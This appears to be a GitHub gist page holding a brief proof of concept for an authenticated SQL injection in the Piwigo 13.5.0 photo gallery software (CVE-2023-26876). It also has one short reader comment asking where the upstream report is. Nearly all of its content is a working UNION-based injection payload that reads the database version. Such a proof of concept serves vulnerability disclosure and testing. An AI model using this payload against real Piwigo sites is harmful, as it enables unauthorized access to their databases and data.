rodnt/proof.md

Created April 18, 2023 14:03

Star () You must be signed in to star a gist
Fork () You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/rodnt/a190d14d1715890d8df19bad58b90693.js"></script>
Save rodnt/a190d14d1715890d8df19bad58b90693 to your computer and use it in GitHub Desktop.

Download ZIP

POC - Authenticated SQL injection Piwigo 13.5.0 - CVE-2023-26876

Raw

POC - Authenticated SQL injection Piwigo 13.5.0

Payload: 12 UNION ALL SELECT CONCAT(0x4141414141,IFNULL(CAST(VERSION() AS NCHAR),0x20),0x4141414141)-- --

Author

rodnt commented Apr 18, 2023

ajakk commented Apr 24, 2023

So where's the upstream report?

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment